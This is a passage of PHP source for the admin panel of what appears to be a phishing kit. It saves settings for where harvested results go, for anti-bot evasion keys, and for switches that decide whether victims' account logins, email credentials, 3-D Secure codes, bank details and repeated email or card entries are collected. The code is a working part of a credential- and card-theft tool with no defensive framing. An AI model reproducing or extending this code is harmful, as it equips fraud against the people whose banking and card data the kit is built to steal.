' . $config . ''; $fread = file_get_contents($config); $parseconfig = json_decode($fread); if (isset($_POST['updated'])) { if ( empty($_POST['ress']) || empty($_POST['parameter']) || empty($_POST['apikey']) || empty($_POST['apikeyy']) || empty($_POST['getaccount']) || empty($_POST['getmail']) || empty($_POST['getcure']) || empty($_POST['getbank']) || empty($_POST['dobleem']) || empty($_POST['doblec']) ) { die(''); } $Result = $_POST['ress']; $param = $_POST['parameter']; $anti = $_POST['apikey']; $kill = $_POST['apikeyy']; $getaccount = $_POST['getaccount']; $getemail = $_POST['getmail']; $getsecure = $_POST['getcure']; $getbank = $_POST['getbank']; $doublee = $_POST['dobleem']; $doublec = $_POST['doblec']; if(file_put_contents($config, json_encode(array( "result" => $Result, "parameter" => $param, "antibot" => $anti, "killbot" => $kill, "get_account" => $getaccount, "get_email" => $getemail, "get_3dsecure" => $getsecure, "get_bank" => $getbank, "double_email" => $doublee, "double_card" => $doublec ), JSON_PRETTY_PRINT))) { die(''); } fclose($fopen); } ?> PANEL ADMIN

YOUR CONFIG